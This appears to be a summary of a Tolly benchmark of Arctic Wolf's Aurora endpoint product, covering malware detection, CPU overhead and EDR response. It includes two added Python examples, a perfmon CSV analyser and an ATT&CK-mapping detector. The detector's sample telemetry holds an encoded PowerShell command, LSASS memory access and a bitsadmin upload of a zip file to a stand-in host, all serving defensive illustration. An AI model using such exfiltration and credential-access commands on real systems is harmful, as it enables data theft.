Aurora Endpoint Security Efficacy with Endpoint Detection & Response
Abstract
Arctic Wolf commissioned Tolly to benchmark the threat protection efficacy, system resource consumption, and endpoint detection & response features of its Aurora Endpoint Security solution in a Windows 11 environment.
Arctic Wolf’s Aurora Endpoint Security is presented in this Tolly evaluation as an endpoint protection platform designed to balance strong malware prevention with low system overhead, while also extending into behavioral endpoint detection and response. The report focuses on two practical enterprise concerns: whether the product can stop current malware effectively, and whether it can do so without consuming so many endpoint resources that user productivity suffers. Tolly evaluated Aurora in a Windows 11 Pro 2024H2 environment running on an Azure virtual machine with a 2.3GHz Intel Xeon processor, 8GB of RAM, and 16GB of storage.
In malware-protection testing, Aurora Endpoint Security achieved a 100% detection and quarantine rate against a folder containing 1,000 recent malware samples sourced from major public repositories. The samples were delivered in a password-protected ZIP file so engineers could control when scanning began, and the endpoint had Internet access so the product could use both local intelligence and centralized threat databases during analysis. Tolly repeated the test with two separate 1,000-sample subsets and reported consistent detection results across runs.
Resource consumption was a major part of the evaluation. During active scanning, Aurora used approximately 33% average CPU, as measured with Microsoft Resource Monitor and one-second perfmon sampling. Tolly positions this as a favorable result for enterprises that need continuous protection but cannot tolerate excessive endpoint slowdown, especially in resource-constrained or operational technology environments. The report notes that while the specific test scenario is intentionally demanding, it demonstrates that Aurora can sustain effective scanning without imposing unusually high CPU load.
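The CPU figure above comes from one-second perfmon sampling of the agent process during a scan. The following Python script, added here as an illustration and not part of the Tolly report or Arctic Wolf's tooling, shows how such a capture is reduced to the reported average: it parses the CSV format that perfmon and typeperf export (a "(PDH-CSV 4.0)" header followed by one row per sample), locates the scan window as the span where the agent's CPU counter stays above an idle threshold, and reports the average, peak and 95th percentile over that window. The machine name `WIN11`, the process instance name `agent` and the sample values are constructed placeholders, not the product's real process name or Tolly's data.

```python
"""Reduce a perfmon (PDH) CSV capture to average/peak CPU over a scan window.
Added example; the counter names, machine name and sample values below are
constructed, not taken from the Tolly report."""
import csv
import io
import statistics
from datetime import datetime

# Constructed capture: ten one-second samples of the host total and of a
# hypothetical endpoint-agent process (instance name "agent" is an assumption).
# PDH writes a blank (" ") cell when a counter has no value yet; row 1 shows that.
AGENT_COUNTER = r"\\WIN11\Process(agent)\% Processor Time"
TOTAL_COUNTER = r"\\WIN11\Processor(_Total)\% Processor Time"
SAMPLE_CSV = r'''"(PDH-CSV 4.0) (Coordinated Universal Time)(0)","\\WIN11\Processor(_Total)\% Processor Time","\\WIN11\Process(agent)\% Processor Time"
"01/15/2025 10:00:00.000","3.0"," "
"01/15/2025 10:00:01.000","2.5","1.5"
"01/15/2025 10:00:02.000","41.0","30.0"
"01/15/2025 10:00:03.000","47.0","36.0"
"01/15/2025 10:00:04.000","44.0","32.0"
"01/15/2025 10:00:05.000","45.0","34.0"
"01/15/2025 10:00:06.000","43.0","33.0"
"01/15/2025 10:00:07.000","4.0","2.0"
"01/15/2025 10:00:08.000","2.0","1.0"
"01/15/2025 10:00:09.000","1.5","0.5"
'''


def parse_pdh_csv(text):
    """Return (timestamps, {counter_path: [value_or_None, ...]}).

    The first column is the sample time; every other column is one counter
    path exactly as perfmon names it. Blank cells become None.
    """
    rows = list(csv.reader(io.StringIO(text)))
    counters = rows[0][1:]
    series = {c: [] for c in counters}
    stamps = []
    for row in rows[1:]:
        if not row:
            continue
        stamps.append(datetime.strptime(row[0], "%m/%d/%Y %H:%M:%S.%f"))
        for counter, cell in zip(counters, row[1:]):
            series[counter].append(None if cell.strip() == "" else float(cell))
    return stamps, series


def scan_window(stamps, values, threshold):
    """First and last sample time at which the counter is at or above threshold.

    Used to isolate the active scan from the idle periods around it without
    relying on a manual start/stop marker.
    """
    active = [t for t, v in zip(stamps, values) if v is not None and v >= threshold]
    return (active[0], active[-1]) if active else (None, None)


def summarize(stamps, values, start=None, end=None):
    """Average, peak and 95th percentile of one counter within [start, end].

    Note that the Process\\% Processor Time counter sums across logical cores,
    so a busy multi-threaded process can legitimately exceed 100.
    """
    pts = [v for t, v in zip(stamps, values)
           if v is not None
           and (start is None or t >= start)
           and (end is None or t <= end)]
    if not pts:
        raise ValueError("no samples in the requested window")
    ordered = sorted(pts)
    p95_index = min(len(ordered) - 1, int(round(0.95 * (len(ordered) - 1))))
    return {
        "samples": len(pts),
        "avg": round(statistics.fmean(pts), 1),
        "max": max(pts),
        "p95": ordered[p95_index],
    }


if __name__ == "__main__":
    stamps, series = parse_pdh_csv(SAMPLE_CSV)
    agent = series[AGENT_COUNTER]
    start, end = scan_window(stamps, agent, threshold=10.0)
    print("scan window:", start.time(), "to", end.time())
    print("agent CPU during scan:", summarize(stamps, agent, start, end))
    print("agent CPU whole capture:", summarize(stamps, agent))
    print("host total during scan:", summarize(stamps, series[TOTAL_COUNTER], start, end))
```

Reporting the whole-capture average alongside the in-window average matters: idle seconds before and after the scan pull the mean down, so a claim such as "33% during active scanning" is only comparable between products when the window is chosen the same way for each.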
Tolly also evaluated Aurora Focus, the platform’s behavioral EDR capability. In a multi-stage attack simulation that included encoded PowerShell execution, payload staging, MSHTA UAC bypass, LSASS credential dumping, scheduled task persistence, Windows event log clearing, and BITSAdmin-based exfiltration, Aurora Focus detected every stage of the attack chain in observability mode. With autonomous response enabled, it stopped the attack at the first stage by terminating the encoded PowerShell process and executing evidence-collection playbooks. Tolly further notes that these detection and response functions continued to operate even when cloud connectivity was removed, and that the product mapped detections to the MITRE ATT&CK framework while using an embedded AI assistant to explain suspicious behavior and command-line context.
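To make the two operating modes in that test concrete, the Python example below, added here and not drawn from the Tolly report or from Arctic Wolf's product, runs a small rule set over constructed Windows telemetry for the same stages (Security event 4688 process creation, Sysmon event 10 process access, Security 4698 scheduled task creation, Security 1102 log clearing), maps each hit to its ATT&CK technique ID, and then shows the difference between observability mode (every stage of the chain is recorded) and autonomous response (the chain is cut at the first hit). The event dictionaries, their field names, the command lines and the timestamps are simplified assumptions constructed for this example, not Aurora's telemetry format; the ATT&CK IDs are the public ones for these techniques.

```python
"""Rule-based mapping of endpoint events to ATT&CK techniques, with
observability-mode and autonomous-response views of a multi-stage chain.
Added example; event shapes and sample data are constructed, not product data."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Detection:
    ts: str
    stage: str
    technique: str   # MITRE ATT&CK technique ID
    evidence: str


def _cmd(event):
    """Lower-cased command line, or '' for events that carry none."""
    return event.get("CommandLine", "").lower()


# (stage name, ATT&CK ID, predicate). Rules are deliberately narrow so the
# benign events in the sample do not fire; real products use far richer logic.
RULES = [
    ("encoded PowerShell execution", "T1059.001",
     # -e / -ec / -en... are the accepted prefixes of -EncodedCommand
     lambda e: e["id"] == 4688 and "powershell" in _cmd(e)
     and re.search(r"\s-(e|ec|en[a-z]*)\s", _cmd(e)) is not None),
    ("MSHTA launched with a user-writable HTA", "T1218.005",
     lambda e: e["id"] == 4688 and "mshta.exe" in _cmd(e) and "\\users\\" in _cmd(e)),
    ("LSASS memory access", "T1003.001",
     lambda e: e["provider"] == "Sysmon" and e["id"] == 10
     and e.get("TargetImage", "").lower().endswith("\\lsass.exe")),
    ("scheduled task persistence", "T1053.005",
     lambda e: e["provider"] == "Security" and e["id"] == 4698),
    ("Windows event log cleared", "T1070.001",
     lambda e: e["provider"] == "Security" and e["id"] == 1102),
    ("BITSAdmin transfer", "T1197",
     lambda e: e["id"] == 4688 and "bitsadmin" in _cmd(e) and "/transfer" in _cmd(e)),
]

# Constructed sample telemetry: one event per stage plus two benign events.
SAMPLE_EVENTS = [
    {"ts": "2025-01-15T10:00:01", "provider": "Security", "id": 4688,
     "CommandLine": r"C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt"},
    {"ts": "2025-01-15T10:00:05", "provider": "Security", "id": 4688,
     "CommandLine": r"powershell.exe -EncodedCommand UABsAGEAYwBlAGgAbwBsAGQAZQByAA=="},
    {"ts": "2025-01-15T10:00:09", "provider": "Security", "id": 4688,
     "CommandLine": r"C:\Windows\System32\mshta.exe C:\Users\Public\stage.hta"},
    {"ts": "2025-01-15T10:00:14", "provider": "Sysmon", "id": 10,
     "SourceImage": r"C:\Users\Public\tool.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"ts": "2025-01-15T10:00:20", "provider": "Security", "id": 4698,
     "TaskName": r"\Updater"},
    {"ts": "2025-01-15T10:00:25", "provider": "Security", "id": 1102},
    {"ts": "2025-01-15T10:00:31", "provider": "Security", "id": 4688,
     "CommandLine": r"bitsadmin.exe /transfer job /upload http://example.invalid/u C:\Users\Public\out.zip"},
    {"ts": "2025-01-15T10:00:40", "provider": "Security", "id": 4688,
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
]


def _evidence(event):
    return (event.get("CommandLine") or event.get("TargetImage")
            or event.get("TaskName") or f"EventID {event['id']}")


def detect(events):
    """Observability mode: evaluate every event and return all hits in time order."""
    hits = []
    for event in sorted(events, key=lambda e: e["ts"]):
        for stage, technique, predicate in RULES:
            if predicate(event):
                hits.append(Detection(event["ts"], stage, technique, _evidence(event)))
    return hits


def first_interrupt(events):
    """Autonomous response: the first hit is where the chain would be cut,
    so later stages never occur. Returns None if nothing fires."""
    hits = detect(events)
    return hits[0] if hits else None


if __name__ == "__main__":
    print("observability mode:")
    for d in detect(SAMPLE_EVENTS):
        print(f"  {d.ts}  {d.technique:<10} {d.stage}: {d.evidence}")
    stop = first_interrupt(SAMPLE_EVENTS)
    print("autonomous response would terminate at:", stop.technique, stop.stage)
```

The useful contrast for a practitioner is the two return values: `detect()` yields the full chain the report describes as "every stage", while `first_interrupt()` yields the single encoded-PowerShell hit, which is exactly the point at which the report says autonomous response terminated the process. Because the rules are narrow, the benign notepad and `-File` PowerShell events produce no detections, which is the property to check when tuning such rules against real endpoint noise.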
Overall, the report presents Aurora Endpoint Security as a combination of high efficacy, comparatively low CPU impact, and advanced behavioral protection. The result is positioned as a fit for organizations that need both strong prevention against known malware and effective detection and interruption of multi-stage attacks that traditional signature-based tools may miss.